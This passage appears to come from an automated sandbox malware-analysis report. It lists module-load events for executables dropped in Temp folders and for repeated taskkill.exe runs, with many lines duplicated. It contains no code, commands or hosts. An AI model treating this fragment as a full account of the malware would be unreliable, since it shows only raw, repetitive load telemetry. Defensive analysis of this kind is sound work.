                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: rstrtmgr.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: webio.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeSection loaded: wldp.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: rstrtmgr.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: ncrypt.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: ntasn1.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: iertutil.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: winhttp.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: winnsi.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: urlmon.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: srvcli.dll
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
